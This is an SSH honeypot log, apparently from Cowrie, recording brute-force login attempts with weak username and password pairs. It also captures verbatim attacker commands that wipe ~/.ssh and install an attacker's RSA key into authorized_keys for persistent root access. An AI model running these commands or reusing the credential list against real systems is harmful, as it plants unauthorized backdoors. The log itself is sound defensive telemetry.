{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":54478,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca9f4e4a8093","protocol":"ssh","message":"New connection: 49.247.35.31:54478 (1.2.3.4:22) [session: ca9f4e4a8093]","sensor":"my-vps","timestamp":"2025-09-08T13:43:54.258815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:43:54.259747Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:43:54.523557Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123abc","message":"login attempt [mysql/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:43:54.947164Z","src_ip":"134.199.174.250","session":"2a1381a4ffc9"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin.2025","message":"login attempt [root/Admin.2025] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:43:55.643506Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:43:56.199291Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:43:56.200032Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:43:56.201222Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:43:56.247576Z","src_ip":"134.199.174.250","session":"2a1381a4ffc9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:43:56.484185Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:43:57.136069Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:43:57.136847Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:43:57.402898Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:43:57.403812Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":33776,"dst_ip":"1.2.3.4","dst_port":22,"session":"400e2a470639","protocol":"ssh","message":"New connection: 49.247.35.31:33776 (1.2.3.4:22) [session: 400e2a470639]","sensor":"my-vps","timestamp":"2025-09-08T13:43:57.694069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:43:57.702310Z","src_ip":"49.247.35.31","session":"400e2a470639"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:43:57.993864Z","src_ip":"49.247.35.31","session":"400e2a470639"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:43:59.159368Z","src_ip":"49.247.35.31","session":"400e2a470639"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:00.455812Z","src_ip":"49.247.35.31","session":"400e2a470639"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":27795,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd6c65d52982","protocol":"ssh","message":"New connection: 49.247.35.31:27795 (1.2.3.4:22) [session: dd6c65d52982]","sensor":"my-vps","timestamp":"2025-09-08T13:44:00.737970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:44:00.739387Z","src_ip":"49.247.35.31","session":"dd6c65d52982"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:44:01.035057Z","src_ip":"49.247.35.31","session":"dd6c65d52982"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:44:02.219995Z","src_ip":"49.247.35.31","session":"dd6c65d52982"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:02.534642Z","src_ip":"49.247.35.31","session":"ca9f4e4a8093"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:02.535515Z","src_ip":"49.247.35.31","session":"dd6c65d52982"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36454,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2946435553c","protocol":"ssh","message":"New connection: 212.227.235.229:36454 (1.2.3.4:22) [session: d2946435553c]","sensor":"my-vps","timestamp":"2025-09-08T13:44:05.672968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:44:05.673858Z","src_ip":"212.227.235.229","session":"d2946435553c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:44:05.781735Z","src_ip":"212.227.235.229","session":"d2946435553c"}
{"eventid":"cowrie.login.failed","username":"vladimir","password":"Password1","message":"login attempt [vladimir/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:44:06.257698Z","src_ip":"212.227.235.229","session":"d2946435553c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:07.365047Z","src_ip":"212.227.235.229","session":"d2946435553c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51408,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac642ec788d1","protocol":"ssh","message":"New connection: 212.227.235.229:51408 (1.2.3.4:22) [session: ac642ec788d1]","sensor":"my-vps","timestamp":"2025-09-08T13:44:21.868019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:44:21.869074Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:44:21.992354Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.login.success","username":"root","password":"ABCabc123456","message":"login attempt [root/ABCabc123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:44:22.522651Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:44:22.818976Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:44:22.819627Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:44:22.820429Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:22.943980Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:44:23.204573Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:44:23.205287Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:44:23.329571Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:23.330563Z","src_ip":"212.227.235.229","session":"ac642ec788d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51410,"dst_ip":"1.2.3.4","dst_port":22,"session":"32715666b914","protocol":"ssh","message":"New connection: 212.227.235.229:51410 (1.2.3.4:22) [session: 32715666b914]","sensor":"my-vps","timestamp":"2025-09-08T13:44:23.462019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:44:23.462792Z","src_ip":"212.227.235.229","session":"32715666b914"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:44:23.593536Z","src_ip":"212.227.235.229","session":"32715666b914"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":48394,"dst_ip":"1.2.3.4","dst_port":22,"session":"d41f2e5ae62b","protocol":"ssh","message":"New connection: 134.199.174.250:48394 (1.2.3.4:22) [session: d41f2e5ae62b]","sensor":"my-vps","timestamp":"2025-09-08T13:44:23.979681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:44:23.980465Z","src_ip":"134.199.174.250","session":"d41f2e5ae62b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:44:24.158554Z","src_ip":"212.227.235.229","session":"32715666b914"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:44:24.289829Z","src_ip":"134.199.174.250","session":"d41f2e5ae62b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:44:25.291180Z","src_ip":"212.227.235.229","session":"32715666b914"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1234567890","message":"login attempt [backup/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:44:25.294490Z","src_ip":"134.199.174.250","session":"d41f2e5ae62b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51424,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f4d147f364c","protocol":"ssh","message":"New connection: 212.227.235.229:51424 (1.2.3.4:22) [session: 2f4d147f364c]","sensor":"my-vps","timestamp":"2025-09-08T13:44:25.420721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:44:25.422149Z","src_ip":"212.227.235.229","session":"2f4d147f364c"}
